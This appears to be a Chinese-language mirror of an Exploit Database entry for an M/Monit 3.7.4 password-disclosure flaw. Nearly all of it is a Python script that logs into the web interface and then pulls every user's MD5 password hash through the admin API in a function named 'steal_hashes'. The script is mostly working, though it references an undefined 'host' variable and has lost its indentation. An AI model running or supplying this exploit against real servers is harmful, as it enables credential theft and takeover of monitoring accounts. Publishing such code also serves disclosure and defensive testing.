M/Monit 3.7.4 – Password Disclosure

• Exploit Database
• 19 阅读

• 作者： Dolev Farhi
  日期： 2020-11-19
• 类别：

  • webapps
  平台：

  • multiple
• 来源：https://www.exploit-db.com/exploits/49081/

• # Title: M/Monit 3.7.4 - Password Disclosure
  # Author: Dolev Farhi
  # Date: 2020-07-09
  # Vendor Homepage: https://mmonit.com/
  # Version : 3.7.4
  
  import sys
  import requests
  
  url = 'http://your_ip_here:8080'
  username = 'test'
  password = 'test123'
  
  sess = requests.Session()
  sess.get(host)
  
  def login():
  print('Attempting to login...')
  data = {
  'z_username':username,
  'z_password':password
  }
  headers = {
  'Content-Type':'application/x-www-form-urlencoded'
  }
  
  resp = sess.post(url + '/z_security_check', data=data, headers=headers)
  if resp.ok:
  print('Logged in successfully.')
  else:
  print('Could not login.')
  sys.exit(1)
  
  def steal_hashes():
  resp = sess.get(url + '/api/1/admin/users/list')
  if resp.ok:
  for i in resp.json():
  mmonit_user = i['uname']
  result = sess.get(url + '/api/1/admin/users/get?uname={}'.format(mmonit_user))
  mmonit_passw = result.json()['password']
  print('Stolen MD5 hash. User: {}, Hash: {}'.format(mmonit_user, mmonit_passw))
  
  if __name__ == '__main__':
  login()
  steal_hashes()